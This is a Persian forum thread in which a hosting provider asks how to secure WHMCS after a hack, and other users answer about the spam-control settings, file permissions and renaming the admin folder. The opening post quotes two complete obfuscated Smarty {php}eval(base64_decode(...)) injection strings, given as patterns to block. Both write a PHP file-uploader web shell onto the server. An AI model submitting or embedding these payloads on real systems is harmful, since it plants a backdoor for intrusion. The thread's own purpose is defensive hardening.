مشکل امنیتی در whmcs

[SoltanHost.Net]

سلام دوستان در تاپیکی در همین انجمن مطلبی رو مشاهده و یاد گرفتم که درصدی از امنیت WHMCS رو تامین کنم ولی در بعضی جاهاش به مشکل برخودم که از استادان یا یوزر های محترم

ممنون میشم که به سوالاتم پاسخ دهند

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــ
سوال اول :

برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

کد:

{php}eval(base64_decode('  JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz   hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2   YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF   dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC   c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1   pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U   QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn   pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi   MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT   kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB   WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV   cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk   ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE   lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI   c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3   ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g   PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG  NvZGUpOw=='));{/php}  

کد:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}  

را بلوک کنید

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــــ

این سوال اول بود که اصلا نفهمیدم کجا رو میگه ! اینم سوال دومم

== >

دسترسی فایل کانفیگم بذارید رو 444

اینم دقیق نمی دونم چی رو میگه !

سپاس گزار میشم که اگه پاسخم رو بدید

[Ashkankamangar.ir]

مورد اول
برید به این آدرس
http://clients.site.com/admin/configticketspamcontrol.php
مورد دوم هم برید داخل سیپنلتون و سطح دسترسی فایل
configuration.php رو روی 400 بذارید

[vahab00]

کد اول نباید ارسال بشه از طرف کاربر
فایل دوم هم همون configortion.php هست
پریمیشن 400 بهتر هست

[M-Sadeghi]

یعنی فایل مدیریت رو تغییر اسم بدید و در فایل کانفیگ (configuration.php) این خط رو اضافه کنید

$customadminpath = ' name admin';
بجای نیم ادمین اسم فایل ادمین که تغییر دادید رو بنویسید.

[SoltanHost.Net]

سپاس از همه دوستان ، اقای ام - صادقی من همین کار رو کاملا درست انجام دادم ولی وقتی میزنم وارد پنل ادمینم بشه مثل

http://my damin name.com/adminpanel

یعنی ادمین رو به ادمین پنل اسم پوشه رو تغیر دادم ولی حالا که این ادرس رو میزنم می نویسه Language Folder Not Found چیکار کنم الان ؟

[SoltanHost.Net]

آپ ....

[ULTRAWEB]

آقا شما اگر از نسخه جدید استفاده کنی نیازی نیست به این تنظیمات اصلا نیست
توی انجمن نسخه ی 5.2.15رو خودم گذاشتم کامل هست که باید نصب کنین

[SoltanHost.Net]

سلام بله از اخرین نسخه استفاده میکنم ولی یه هکر ایرانی هکش کرده بود ! اونم اخرین نسخه بود

الان به این مشکل هنگام پرداخت بر میخورم توی انجمن هم تاپیک ها رو مشاهده و طبق گفتهشون پیش رفتم همه چیز درسته ولی نمی دونم چرا این ارور رو میده

اینم ارور : Gateway Module '' is Missing or Invalid

[SoltanHost.Net]

آپ ... ( تاپیک رو بالا نگه میدارم تا عزیزان جواب بدن )

[arvin_b]

سلام
در مورد اسم
باید هم اسم فایل را تغییر بدید هم در فایل کانفیگ $customadminpath = ' name admin'; را اضافه کنید دقیق انجام بدید نباید مشکلی باشه

موفق باشید